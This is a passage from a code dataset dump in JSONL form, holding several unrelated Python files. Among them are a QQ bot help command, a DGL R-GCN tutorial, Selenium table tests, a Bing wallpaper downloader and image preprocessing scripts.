- len(sv.name))\n manual.append(f\"|{'○' if sv.check_enabled(gid) else '×'}| {sv.name} {spit_line}\")\n if sv.help:\n manual.append(sv.help)\n return '\\n'.join(manual)\n\n@sv.on_fullmatch([\"帮助雀魂查询\"])\nasync def bangzhu_majsoul(bot, ev: CQEvent):\n if forward_msg_exchange == 1:\n data_all = []\n msg1 = sv_help\n data1 = {\n \"type\": \"node\",\n \"data\": {\n \"name\": f\"{forward_msg_name}\",\n \"uin\": f\"{forward_msg_uid}\",\n \"content\": msg1\n }\n }\n msg2 = majsoul_help_1\n data2 = {\n \"type\": \"node\",\n \"data\": {\n \"name\": f\"{forward_msg_name}\",\n \"uin\": f\"{forward_msg_uid}\",\n \"content\": msg2\n }\n }\n msg3 = majsoul_help_2\n data3 = {\n \"type\": \"node\",\n \"data\": {\n \"name\": f\"{forward_msg_name}\",\n \"uin\": f\"{forward_msg_uid}\",\n \"content\": msg3\n }\n }\n data_all=[data1,data2,data3]\n if recall_msg_set == 1:\n recall = await bot.send_group_forward_msg(group_id=ev['group_id'], messages=data_all)\n notice = await bot.send(ev, f\"将在{RECALL_MSG_TIME}s后将撤回消息\")\n \n await asyncio.sleep(RECALL_MSG_TIME)\n\n await bot.delete_msg(message_id=recall['message_id'])\n await bot.delete_msg(message_id=notice['message_id'])\n else:\n await bot.send_group_forward_msg(group_id=ev['group_id'], messages=data_all)\n else:\n if recall_msg_set == 1:\n recall_1 = await bot.send(ev, sv_help)\n recall_2 = await bot.send(ev, majsoul_help_1)\n recall_3 = await bot.send(ev, majsoul_help_2)\n notice = await bot.send(ev, f\"将在{RECALL_MSG_TIME}s后将撤回消息\")\n\n await asyncio.sleep(RECALL_MSG_TIME)\n\n await bot.delete_msg(message_id=recall_1['message_id'])\n await bot.delete_msg(message_id=recall_2['message_id'])\n await bot.delete_msg(message_id=recall_3['message_id'])\n await bot.delete_msg(message_id=notice['message_id'])\n else:\n await bot.send(ev, sv_help)\n await bot.send(ev, majsoul_help_1)\n await bot.send(ev, majsoul_help_2)\n\n\n","repo_name":"Soung2279/haru-bot-setup","sub_path":"hoshino/modules/majsoul/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":5018,"program_lang":"python","lang":"zh","doc_type":"code","stars":53,"dataset":"github-code","pt":"54"} +{"seq_id":"41528565646","text":"from kpsn.models.morph import affine_mode as afm\nfrom kpsn.models import pose\nfrom kpsn.util import keypt_io, alignment, skeleton\n\nfrom kpsn_test.routines.util import update\nfrom kpsn_test.routines.datasets import npy_keypts\n\nimport jax.random as jr\n\ndef random_morph(gt_obs, M, n_subj, ref_subj_ix, id_subj_ix, rngk, hyper_kw, param_kw):\n\n morph_hyperparams = afm.init_hyperparams(\n observations = gt_obs,\n N = n_subj, M = M,\n reference_subject = ref_subj_ix,\n identity_sess = id_subj_ix,\n upd_var_modes = 0, # prior variance params don't matter - not learning\n upd_var_ofs = 0,\n **hyper_kw)\n\n morph_params = afm.sample_parameters(\n rkey = rngk,\n hyperparams = morph_hyperparams,\n **param_kw)\n\n return morph_params.with_hyperparams(morph_hyperparams)\n\n\ndef generate(\n cfg: dict,\n ):\n\n (N, M), gt_obs, metadata = npy_keypts.generate(\n cfg = cfg\n )\n\n # ----- set up identical poses for each session\n src_keypts = gt_obs.keypts[metadata['session_slice'][cfg['src_sess']]]\n slices, gt_all_poses = keypt_io.to_flat_array({\n f'subj{i}': src_keypts for i in range(cfg['n_subj'])\n })\n session_ix, session_ids = keypt_io.ids_from_slices(gt_all_poses, slices)\n\n # ------ sample parameters and apply to poses\n \n params = random_morph(\n pose.Observations(gt_all_poses, session_ids),\n M, cfg['n_subj'], session_ix['subj0'], session_ix['subj0'],\n jr.PRNGKey(cfg['seed']), cfg['hyperparam'], cfg['param_sample']\n )\n all_feats = afm.transform(params, gt_all_poses, session_ids)\n\n # ------ format new dataset and return\n new_obs = pose.Observations(all_feats, session_ids)\n\n new_metadata = dict(\n session_ix = session_ix,\n session_slice = slices,\n body = {f'subj{i}': i for i in range(cfg['n_subj'])},\n **{k: {sess: v[cfg['src_sess']] for sess in slices}\n for k, v in metadata.items() if k not in ['session_ix']\n if k not in ['session_ix', 'session_slice']})\n \n return (cfg['n_subj'], M), new_obs, new_metadata\n \n \n\ndefaults = dict(\n src_sess = None,\n **npy_keypts.defaults,\n n_subj = 2,\n hyperparam = dict(\n L = 1,\n ),\n param_sample = dict(\n update_std = 0.03,\n offset_std = 0.5\n ),\n seed = 2\n)","repo_name":"calebweinreb/keypoint-size-norm","sub_path":"test/kpsn_test/routines/datasets/lra_keypts.py","file_name":"lra_keypts.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"26255864754","text":"from pydm.widgets import PyDMLineEdit\n\nfrom siriuspy.opticscorr.csdev import Const as _Const\nfrom siriushla.widgets import SiriusLedAlert\nfrom siriushla.widgets.dialog import StatusDetailDialog\nfrom siriushla.as_ap_configdb import LoadConfigDialog as _LoadConfigDialog\n\n\nclass ConfigLineEdit(PyDMLineEdit):\n\n def mouseReleaseEvent(self, _):\n \"\"\"Reimplement mouse release event.\"\"\"\n if 'SI' in self.channel and 'Tune' in self.channel:\n config_type = 'si_tunecorr_params'\n elif 'BO' in self.channel and 'Tune' in self.channel:\n config_type = 'bo_tunecorr_params'\n elif 'SI' in self.channel and 'Chrom' in self.channel:\n config_type = 'si_chromcorr_params'\n elif 'BO' in self.channel and 'Chrom' in self.channel:\n config_type = 'bo_chromcorr_params'\n popup = _LoadConfigDialog(config_type)\n popup.configname.connect(self._config_changed)\n popup.exec_()\n\n def _config_changed(self, configname):\n self.setText(configname)\n self.send_value()\n self.value_changed(configname)\n\n\nclass StatusLed(SiriusLedAlert):\n\n def __init__(self, parent=None, init_channel='', labels=list()):\n super().__init__(parent, init_channel=init_channel)\n self.parent = parent\n self.labels = labels\n\n def mouseDoubleClickEvent(self, event):\n msg = StatusDetailDialog(\n parent=self.parent, pvname=self.channel,\n labels=_Const.STATUS_LABELS)\n msg.exec_()\n super().mouseDoubleClickEvent(event)\n","repo_name":"lnls-sirius/hla","sub_path":"pyqt-apps/siriushla/as_ap_opticscorr/custom_widgets.py","file_name":"custom_widgets.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"54"} +{"seq_id":"74344935842","text":"# Definition for singly-linked list.\n# class ListNode(object):\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\n\nclass Solution(object):\n def reverseList(self, head):\n if not head: return None\n if not head.next: return head\n \n hold=ListNode(head.next.val, head.next.next)\n myList=ListNode(head.val)\n \n while hold!=None:\n temp=ListNode(myList.val, myList.next)\n \n myList=ListNode(hold.val, None)\n myList.next=temp\n \n hold=hold.next\n \n return myList","repo_name":"charlenerocha/CodingPractice","sub_path":"206-reverse-linked-list/206-reverse-linked-list.py","file_name":"206-reverse-linked-list.py","file_ext":"py","file_size_in_byte":626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"72556833123","text":"import random\nimport os\n\ndef run():\n menu = \"\"\" Adivina el numero\n \n 3.- Facil (9 oportunidades)\n 2.- Medio (6 oportunidades)\n 1.- Dificil (3 oportunidades)\n \n Indica el nivel al que deseas competir: \"\"\"\n \n vueltas = int(input(menu)) * 3\n tope = int(input('Ingresa el limite superior a adivinar: '))\n rand = random.randint(0,tope)\n win = False\n\n numero = int(input('Ingresa un numero: '))\n for i in range(1,vueltas):\n if numero == rand:\n os.system('clear')\n print('Felicidades!!! ganaste el juego')\n win = True\n break\n elif numero < rand:\n print('Fallaste, tienes ' + str(vueltas-i)+' oportunidades mas')\n numero = int(input('El numero ingresado es menor al calculado por la PC, intenta subiendo un poco: '))\n os.system('clear')\n elif numero > rand:\n print('Fallaste, tienes ' + str(vueltas-i)+' oportunidades mas')\n numero = int(input('El numero ingresado es mayor al calculado por la PC, intenta bajando un poco: '))\n os.system('clear')\n if win == False:\n \n print('Ni modo perdiste, vuelve a intentarlo (talvez en un nivel mas facil)') \n\nif __name__ == '__main__':\n run()","repo_name":"avasquez-80/PracticasPython","sub_path":"juego_numeros.py","file_name":"juego_numeros.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"30942420416","text":"from tests.uitestwrapper import UiTestWrapper\nfrom seleniumpm.webelements.table import Table\nfrom seleniumpm.locator import Locator\nfrom selenium.webdriver.common.by import By\n\n\nclass TestTable(UiTestWrapper):\n def test_instantiate_table(self):\n xpath = \"//table\"\n table = Table(self.driver, Locator(By.XPATH, xpath))\n assert table != None\n\n def test_two_table_are_equal(self):\n xpath = \"//table\"\n table1 = Table(self.driver, Locator(By.XPATH, xpath))\n table2 = Table(self.driver, Locator(By.XPATH, xpath))\n assert table1 == table2\n assert not (table1 != table2)\n\n def test_two_table_are_not_equal_by_value(self):\n xpath = \"//table\"\n xpath2 = \"//table/bar\"\n table1 = Table(self.driver, Locator(By.XPATH, xpath))\n table2 = Table(self.driver, Locator(By.XPATH, xpath2))\n assert table1 != table2\n assert not (table1 == table2)\n\n def test_get_locator(self):\n xpath = \"//table\"\n table = Table(self.driver, Locator(By.XPATH, xpath))\n # Get 2nd row 4th column\n assert table.get_locator(1, 3) == Locator(By.XPATH, \"{}{}\".format(xpath, \"/tbody/tr[1]/td[3]\"))\n # Get 1st row 2nd column\n assert table.get_locator(0, 1) == Locator(By.XPATH, \"{}{}\".format(xpath, \"/tbody/tr[0]/td[1]\"))\n # Get 30th row 5th column\n assert table.get_locator(29, 4) == Locator(By.XPATH, \"{}{}\".format(xpath, \"/tbody/tr[29]/td[4]\"))\n\n\n def test_get_rows(self):\n xpath = \"//table\"\n table = Table(self.driver, Locator(By.XPATH, xpath))\n rows = table.get_rows()\n assert isinstance(rows, list)\n assert len(rows) == 0\n\n def test_count_rows(self):\n xpath = \"//table\"\n table = Table(self.driver, Locator(By.XPATH, xpath))\n count = table.count_rows()\n assert count == 0\n\n def test_error_if_specify_table_with_non_xpath_locator(self):\n xpath = \"//table\"\n try:\n Table(self.driver, Locator(By.CLASS_NAME, xpath))\n assert False, \"Expected there to be an AttributeError\"\n except AttributeError:\n pass\n","repo_name":"gradeawarrior/python-seleniumpm","sub_path":"tests/webelements/test_table.py","file_name":"test_table.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"71587609121","text":"\"\"\"\r\n.. _model-rgcn:\r\n\r\nRelational Graph Convolutional Network\r\n================================================\r\n\r\n**Author:** Lingfan Yu, Mufei Li, Zheng Zhang\r\n\r\n.. warning::\r\n\r\n The tutorial aims at gaining insights into the paper, with code as a mean\r\n of explanation. The implementation thus is NOT optimized for running\r\n efficiency. For recommended implementation, please refer to the `official\r\n examples `_.\r\n\r\nIn this tutorial, you learn how to implement a relational graph convolutional\r\nnetwork (R-GCN). This type of network is one effort to generalize GCN \r\nto handle different relationships between entities in a knowledge base. To \r\nlearn more about the research behind R-GCN, see `Modeling Relational Data with Graph Convolutional\r\nNetworks `_ \r\n\r\nThe straightforward graph convolutional network (GCN) exploits\r\nstructural information of a dataset (that is, the graph connectivity) in order to\r\nimprove the extraction of node representations. Graph edges are left as\r\nuntyped.\r\n\r\nA knowledge graph is made up of a collection of triples in the form\r\nsubject, relation, object. Edges thus encode important information and\r\nhave their own embeddings to be learned. Furthermore, there may exist\r\nmultiple edges among any given pair.\r\n\r\n\"\"\"\n###############################################################################\n# A brief introduction to R-GCN\n# ---------------------------\n# In *statistical relational learning* (SRL), there are two fundamental\n# tasks:\n#\n# - **Entity classification** - Where you assign types and categorical\n# properties to entities.\n# - **Link prediction** - Where you recover missing triples.\n#\n# In both cases, missing information is expected to be recovered from the\n# neighborhood structure of the graph. For example, the R-GCN\n# paper cited earlier provides the following example. Knowing that Mikhail Baryshnikov was educated at the Vaganova Academy\n# implies both that Mikhail Baryshnikov should have the label person, and\n# that the triple (Mikhail Baryshnikov, lived in, Russia) must belong to the\n# knowledge graph.\n#\n# R-GCN solves these two problems using a common graph convolutional network. It's\n# extended with multi-edge encoding to compute embedding of the entities, but\n# with different downstream processing.\n#\n# - Entity classification is done by attaching a softmax classifier at the\n# final embedding of an entity (node). Training is through loss of standard\n# cross-entropy.\n# - Link prediction is done by reconstructing an edge with an autoencoder\n# architecture, using a parameterized score function. Training uses negative\n# sampling.\n#\n# This tutorial focuses on the first task, entity classification, to show how to generate entity\n# representation. `Complete\n# code `_\n# for both tasks is found in the DGL Github repository.\n#\n# Key ideas of R-GCN\n# -------------------\n# Recall that in GCN, the hidden representation for each node :math:`i` at\n# :math:`(l+1)^{th}` layer is computed by:\n#\n# .. math:: h_i^{l+1} = \\sigma\\left(\\sum_{j\\in N_i}\\frac{1}{c_i} W^{(l)} h_j^{(l)}\\right)~~~~~~~~~~(1)\\\\\n#\n# where :math:`c_i` is a normalization constant.\n#\n# The key difference between R-GCN and GCN is that in R-GCN, edges can\n# represent different relations. In GCN, weight :math:`W^{(l)}` in equation\n# :math:`(1)` is shared by all edges in layer :math:`l`. In contrast, in\n# R-GCN, different edge types use different weights and only edges of the\n# same relation type :math:`r` are associated with the same projection weight\n# :math:`W_r^{(l)}`.\n#\n# So the hidden representation of entities in :math:`(l+1)^{th}` layer in\n# R-GCN can be formulated as the following equation:\n#\n# .. math:: h_i^{l+1} = \\sigma\\left(W_0^{(l)}h_i^{(l)}+\\sum_{r\\in R}\\sum_{j\\in N_i^r}\\frac{1}{c_{i,r}}W_r^{(l)}h_j^{(l)}\\right)~~~~~~~~~~(2)\\\\\n#\n# where :math:`N_i^r` denotes the set of neighbor indices of node :math:`i`\n# under relation :math:`r\\in R` and :math:`c_{i,r}` is a normalization\n# constant. In entity classification, the R-GCN paper uses\n# :math:`c_{i,r}=|N_i^r|`.\n#\n# The problem of applying the above equation directly is the rapid growth of\n# the number of parameters, especially with highly multi-relational data. In\n# order to reduce model parameter size and prevent overfitting, the original\n# paper proposes to use basis decomposition.\n#\n# .. math:: W_r^{(l)}=\\sum\\limits_{b=1}^B a_{rb}^{(l)}V_b^{(l)}~~~~~~~~~~(3)\\\\\n#\n# Therefore, the weight :math:`W_r^{(l)}` is a linear combination of basis\n# transformation :math:`V_b^{(l)}` with coefficients :math:`a_{rb}^{(l)}`.\n# The number of bases :math:`B` is much smaller than the number of relations\n# in the knowledge base.\n#\n# .. note::\n# Another weight regularization, block-decomposition, is implemented in\n# the `link prediction `_.\n#\n# Implement R-GCN in DGL\n# ----------------------\n#\n# An R-GCN model is composed of several R-GCN layers. The first R-GCN layer\n# also serves as input layer and takes in features (for example, description texts)\n# that are associated with node entity and project to hidden space. In this tutorial,\n# we only use the entity ID as an entity feature.\n#\n# R-GCN layers\n# ~~~~~~~~~~~~\n#\n# For each node, an R-GCN layer performs the following steps:\n#\n# - Compute outgoing message using node representation and weight matrix\n# associated with the edge type (message function)\n# - Aggregate incoming messages and generate new node representations (reduce\n# and apply function)\n#\n# The following code is the definition of an R-GCN hidden layer.\n#\n# .. note::\n# Each relation type is associated with a different weight. Therefore,\n# the full weight matrix has three dimensions: relation, input_feature,\n# output_feature.\n#\n# .. note::\n#\n# This is showing how to implement an R-GCN from scratch. DGL provides a more\n# efficient :class:`builtin R-GCN layer module `.\n#\n\nimport os\n\nos.environ[\"DGLBACKEND\"] = \"pytorch\"\nfrom functools import partial\n\nimport dgl\nimport dgl.function as fn\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom dgl import DGLGraph\n\n\nclass RGCNLayer(nn.Module):\n def __init__(\n self,\n in_feat,\n out_feat,\n num_rels,\n num_bases=-1,\n bias=None,\n activation=None,\n is_input_layer=False,\n ):\n super(RGCNLayer, self).__init__()\n self.in_feat = in_feat\n self.out_feat = out_feat\n self.num_rels = num_rels\n self.num_bases = num_bases\n self.bias = bias\n self.activation = activation\n self.is_input_layer = is_input_layer\n\n # sanity check\n if self.num_bases <= 0 or self.num_bases > self.num_rels:\n self.num_bases = self.num_rels\n # weight bases in equation (3)\n self.weight = nn.Parameter(\n torch.Tensor(self.num_bases, self.in_feat, self.out_feat)\n )\n if self.num_bases < self.num_rels:\n # linear combination coefficients in equation (3)\n self.w_comp = nn.Parameter(\n torch.Tensor(self.num_rels, self.num_bases)\n )\n # add bias\n if self.bias:\n self.bias = nn.Parameter(torch.Tensor(out_feat))\n # init trainable parameters\n nn.init.xavier_uniform_(\n self.weight, gain=nn.init.calculate_gain(\"relu\")\n )\n if self.num_bases < self.num_rels:\n nn.init.xavier_uniform_(\n self.w_comp, gain=nn.init.calculate_gain(\"relu\")\n )\n if self.bias:\n nn.init.xavier_uniform_(\n self.bias, gain=nn.init.calculate_gain(\"relu\")\n )\n\n def forward(self, g):\n if self.num_bases < self.num_rels:\n # generate all weights from bases (equation (3))\n weight = self.weight.view(\n self.in_feat, self.num_bases, self.out_feat\n )\n weight = torch.matmul(self.w_comp, weight).view(\n self.num_rels, self.in_feat, self.out_feat\n )\n else:\n weight = self.weight\n if self.is_input_layer:\n\n def message_func(edges):\n # for input layer, matrix multiply can be converted to be\n # an embedding lookup using source node id\n embed = weight.view(-1, self.out_feat)\n index = edges.data[dgl.ETYPE] * self.in_feat + edges.src[\"id\"]\n return {\"msg\": embed[index] * edges.data[\"norm\"]}\n\n else:\n\n def message_func(edges):\n w = weight[edges.data[dgl.ETYPE]]\n msg = torch.bmm(edges.src[\"h\"].unsqueeze(1), w).squeeze()\n msg = msg * edges.data[\"norm\"]\n return {\"msg\": msg}\n\n def apply_func(nodes):\n h = nodes.data[\"h\"]\n if self.bias:\n h = h + self.bias\n if self.activation:\n h = self.activation(h)\n return {\"h\": h}\n\n g.update_all(message_func, fn.sum(msg=\"msg\", out=\"h\"), apply_func)\n\n\n###############################################################################\n# Full R-GCN model defined\n# ~~~~~~~~~~~~~~~~~~~~~~~\n\n\nclass Model(nn.Module):\n def __init__(\n self,\n num_nodes,\n h_dim,\n out_dim,\n num_rels,\n num_bases=-1,\n num_hidden_layers=1,\n ):\n super(Model, self).__init__()\n self.num_nodes = num_nodes\n self.h_dim = h_dim\n self.out_dim = out_dim\n self.num_rels = num_rels\n self.num_bases = num_bases\n self.num_hidden_layers = num_hidden_layers\n\n # create rgcn layers\n self.build_model()\n\n # create initial features\n self.features = self.create_features()\n\n def build_model(self):\n self.layers = nn.ModuleList()\n # input to hidden\n i2h = self.build_input_layer()\n self.layers.append(i2h)\n # hidden to hidden\n for _ in range(self.num_hidden_layers):\n h2h = self.build_hidden_layer()\n self.layers.append(h2h)\n # hidden to output\n h2o = self.build_output_layer()\n self.layers.append(h2o)\n\n # initialize feature for each node\n def create_features(self):\n features = torch.arange(self.num_nodes)\n return features\n\n def build_input_layer(self):\n return RGCNLayer(\n self.num_nodes,\n self.h_dim,\n self.num_rels,\n self.num_bases,\n activation=F.relu,\n is_input_layer=True,\n )\n\n def build_hidden_layer(self):\n return RGCNLayer(\n self.h_dim,\n self.h_dim,\n self.num_rels,\n self.num_bases,\n activation=F.relu,\n )\n\n def build_output_layer(self):\n return RGCNLayer(\n self.h_dim,\n self.out_dim,\n self.num_rels,\n self.num_bases,\n activation=partial(F.softmax, dim=1),\n )\n\n def forward(self, g):\n if self.features is not None:\n g.ndata[\"id\"] = self.features\n for layer in self.layers:\n layer(g)\n return g.ndata.pop(\"h\")\n\n\n###############################################################################\n# Handle dataset\n# ~~~~~~~~~~~~~~~~\n# This tutorial uses Institute for Applied Informatics and Formal Description Methods (AIFB) dataset from R-GCN paper.\n\n# load graph data\ndataset = dgl.data.rdf.AIFBDataset()\ng = dataset[0]\ncategory = dataset.predict_category\ntrain_mask = g.nodes[category].data.pop(\"train_mask\")\ntest_mask = g.nodes[category].data.pop(\"test_mask\")\ntrain_idx = torch.nonzero(train_mask, as_tuple=False).squeeze()\ntest_idx = torch.nonzero(test_mask, as_tuple=False).squeeze()\nlabels = g.nodes[category].data.pop(\"label\")\nnum_rels = len(g.canonical_etypes)\nnum_classes = dataset.num_classes\n# normalization factor\nfor cetype in g.canonical_etypes:\n g.edges[cetype].data[\"norm\"] = dgl.norm_by_dst(g, cetype).unsqueeze(1)\ncategory_id = g.ntypes.index(category)\n\n###############################################################################\n# Create graph and model\n# ~~~~~~~~~~~~~~~~~~~~~~~\n\n# configurations\nn_hidden = 16 # number of hidden units\nn_bases = -1 # use number of relations as number of bases\nn_hidden_layers = 0 # use 1 input layer, 1 output layer, no hidden layer\nn_epochs = 25 # epochs to train\nlr = 0.01 # learning rate\nl2norm = 0 # L2 norm coefficient\n\n# create graph\ng = dgl.to_homogeneous(g, edata=[\"norm\"])\nnode_ids = torch.arange(g.num_nodes())\ntarget_idx = node_ids[g.ndata[dgl.NTYPE] == category_id]\n\n# create model\nmodel = Model(\n g.num_nodes(),\n n_hidden,\n num_classes,\n num_rels,\n num_bases=n_bases,\n num_hidden_layers=n_hidden_layers,\n)\n\n###############################################################################\n# Training loop\n# ~~~~~~~~~~~~~~~~\n\n# optimizer\noptimizer = torch.optim.Adam(model.parameters(), lr=lr, weight_decay=l2norm)\n\nprint(\"start training...\")\nmodel.train()\nfor epoch in range(n_epochs):\n optimizer.zero_grad()\n logits = model.forward(g)\n logits = logits[target_idx]\n loss = F.cross_entropy(logits[train_idx], labels[train_idx])\n loss.backward()\n\n optimizer.step()\n\n train_acc = torch.sum(logits[train_idx].argmax(dim=1) == labels[train_idx])\n train_acc = train_acc.item() / len(train_idx)\n val_loss = F.cross_entropy(logits[test_idx], labels[test_idx])\n val_acc = torch.sum(logits[test_idx].argmax(dim=1) == labels[test_idx])\n val_acc = val_acc.item() / len(test_idx)\n print(\n \"Epoch {:05d} | \".format(epoch)\n + \"Train Accuracy: {:.4f} | Train Loss: {:.4f} | \".format(\n train_acc, loss.item()\n )\n + \"Validation Accuracy: {:.4f} | Validation loss: {:.4f}\".format(\n val_acc, val_loss.item()\n )\n )\n###############################################################################\n# .. _link-prediction:\n#\n# The second task, link prediction\n# --------------------------------\n# So far, you have seen how to use DGL to implement entity classification with an\n# R-GCN model. In the knowledge base setting, representation generated by\n# R-GCN can be used to uncover potential relationships between nodes. In the\n# R-GCN paper, the authors feed the entity representations generated by R-GCN\n# into the `DistMult `_ prediction model\n# to predict possible relationships.\n#\n# The implementation is similar to that presented here, but with an extra DistMult layer\n# stacked on top of the R-GCN layers. You can find the complete\n# implementation of link prediction with R-GCN in our `Github Python code\n# example `_.\n","repo_name":"dmlc/dgl","sub_path":"tutorials/models/1_gnn/4_rgcn.py","file_name":"4_rgcn.py","file_ext":"py","file_size_in_byte":14921,"program_lang":"python","lang":"en","doc_type":"code","stars":12455,"dataset":"github-code","pt":"54"} +{"seq_id":"28155461987","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass ValueNetwork(nn.Module):\n def __init__(self,inputDims, layerDims, outputDims):\n\n super(ValueNetwork, self).__init__()\n\n self.processingLayers = []\n self.layerDims = layerDims\n self.layerDims.insert(0,inputDims)\n self.layerDims.append(outputDims)\n\n for idx in range(len(self.layerDims)-1):\n self.processingLayers.append(nn.Linear(self.layerDims[idx], self.layerDims[idx+1]))\n\n list_param = []\n for a in self.processingLayers:\n list_param.extend(list(a.parameters()))\n\n self.LayerParams = nn.ParameterList(list_param)\n\n def forward(self, inputs):\n\n out = inputs\n for layers in self.processingLayers[:-1]:\n out = layers(out)\n out = F.relu(out)\n\n out = self.processingLayers[-1](out)\n\n return out\n","repo_name":"raharrasy/RL2019-BaseCodes","sub_path":"Exercise3/ExampleUnitTests/SampleNetworks.py","file_name":"SampleNetworks.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"54"} +{"seq_id":"15830376953","text":"from PIL import Image\nimport os\nfrom skimage import io\nfrom skimage import exposure\n\n\n# Функція модифікації та збереження даного зображення\ndef image_modification(filename, carent_folder):\n \"\"\"\n The functon getting name of image and doing next changes with it:\n - convert to jpg format\n - change size of image to 227*227\n - convert to RGB format\n - normalize of image\n - save modify image\n\n :param filename: name of image for modification (str)\n :param carent_folder: name of directory for saving modified image\n\n \"\"\"\n\n # отримуємо розширення зображення\n ext = os.path.splitext(filename)[1]\n\n # Якщо розширення не .jpg, конвертуємо зображення в даний формат\n if ext != '.jpg':\n with Image.open(os.path.join(carent_folder, filename)) as img:\n img = img.convert('RGB')\n filename = os.path.splitext(filename)[0] + '.jpg'\n img.save(os.path.join(carent_folder, filename), 'JPEG')\n\n\n # Відкриваємо зображення для виконання операцій над ним\n with Image.open(os.path.join(carent_folder, filename)) as img:\n\n # змінюємо формат розміру на 227х227\n img = img.resize((227, 227))\n\n # конвертуємо зображення в RGB тип\n img = img.convert('RGB')\n # img = img.convert('L')\n\n # зберігаємо результат перетворень\n img.save(os.path.join(carent_folder, filename))\n\n # відкриваємо збережене зображення\n image = io.imread(os.path.join(carent_folder, filename))\n\n # виконуємо нормалізацію зображення\n normalized_image = exposure.rescale_intensity(image)\n\n # зберігаємо нормалізоване зображення\n io.imsave(os.path.join(carent_folder, filename), normalized_image)\n\n\n\nif __name__ == '__main__':\n\n # цільова директорія\n data_folder = 'C:/Users/админ/PycharmProjects/PDS2/PDS2_Kofanov/My_project/Clear_version/dataset_parser'\n\n # Відкриваємо дочірні директорії (зберігають зображення окремого класу) в цільовій директорії\n for categoria_folder in os.listdir(data_folder):\n\n # шлях до даної дочірньої директорії\n carent_folder = os.path.join(data_folder, categoria_folder)\n\n # список файлів, що зберігаються в даній дочірній директорії\n folders = os.listdir(os.path.join(data_folder, categoria_folder))\n\n # Для кожного файлу використовуємо функцію модифікації\n for filename in folders:\n image_modification(filename, carent_folder)\n\n\n\n\n\n\n","repo_name":"KofanovE/PDS2_Kofanov","sub_path":"My_project/modify_image.py","file_name":"modify_image.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"uk","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"22499156016","text":"import ctypes\r\nimport requests\r\nfrom lxml import etree\r\nimport logging\r\nimport subprocess\r\n\r\nlogging.basicConfig(level=logging.INFO, filename='log.txt', filemode='a',format='%(asctime)s - %(levelname)s - %(message)s')\r\n\r\n# 获取bing的网页背景图片的链接\r\nurl = \"https://cn.bing.com\"\r\nheaders = {\r\n \"user-agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35\"}\r\nrs = requests.get(url=url, headers=headers)\r\nhtml = etree.HTML(rs.content)\r\ntry:\r\n img_url = \"https://www.bing.com\" + html.xpath('//link[@id=\"preloadBg\"]/@href')[0] # 获取第一个括号内的内容\r\n img_url = img_url.replace(\"s.cn.bing.net\", \"\")\r\n img_rs = requests.get(url=img_url)\r\nexcept:\r\n img_url = \"https://www.bing.com\" + html.xpath('//link[@id=\"preloadBg\"]/@href')[0][6:] # 获取第一个括号内的内容\r\n img_url = img_url.replace(\"s.cn.bing.net\", \"\")\r\n img_rs = requests.get(url=img_url)\r\n\r\nlogging.info('Downloading image from ' + img_url)\r\n\r\n# 下载图片到本地\r\nimg_path = \"E:\\\\bing-wallpaper-pictures\\\\bing_wallpaper.jpg\" # 你可以修改图片的保存路径\r\nwith open(img_path, \"wb\") as f:\r\n f.write(img_rs.content)\r\n\r\n# 更改壁纸\r\nSPI_SETDESKWALLPAPER = 20 # 系统参数,表示设置壁纸\r\nSPIF_UPDATEINIFILE = 1 # 系统参数,表示更新配置文件\r\nresult = ctypes.windll.user32.SystemParametersInfoW(SPI_SETDESKWALLPAPER, 0, img_path, SPIF_UPDATEINIFILE)\r\nerror_code = ctypes.GetLastError()\r\n\r\n\r\n\r\nlogging.info(result)\r\nlogging.info(error_code)\r\n","repo_name":"aaale1/window_set_backgroud","sub_path":"bing-wallpaper.py","file_name":"bing-wallpaper.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"70566656802","text":"# -*- coding: utf-8 -*-\nfrom fenics import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom numpy.testing import assert_equal\n\nfrom keller_segel.matrix_default_scheme import (\n KS_Matrix_DefaultScheme, save_coo_matrix )\n\n# Import numba high-performance functions\nfrom keller_segel.numba_optimized import (\n index, compute_D_values, update_F_values )\n\n#==============================================================================\n# class KS_FluxCorrect_DefaultScheme:\n# - Keller-Segel with flux-correction (FC)\n# - Used Numba compiler for high performance (in FC updating of marices)\n#------------------------------------------------------------------------------\n\n#--- Class to ease accessing to matrix data ------------------------------------\n\nclass CSR_Matrix(object):\n \"\"\"Container for a sparse matrix whose data is accesed using CSR\n storage format Current implementation assumes that the PETSC\n backend is being used by FEniCS. The CSR_Matrix wraps this PETSC\n backend.\n \"\"\"\n def __init__(self, FEniCS_matrix=None):\n if FEniCS_matrix != None:\n underlying_PETSc_matrix = as_backend_type(FEniCS_matrix).mat()\n self.update_internal_data(underlying_PETSc_matrix)\n\n def update_internal_data(self, PETSc_matrix):\n self.underlying_PETSc_matrix = PETSc_matrix\n self.I, self.C, self.V = self.underlying_PETSc_matrix.getValuesCSR()\n self.size = self.underlying_PETSc_matrix.size\n self._nrows = self.size[0]\n self._ncols = self.size[1]\n\n def nrows(self):\n return self._nrows #len(I)-1\n\n def duplicate(self):\n \"Returns a new CSR_Matrix which is a copy of this\"\n new_PETSc_matrix = self.underlying_PETSc_matrix.duplicate()\n new_CSR_matrix = 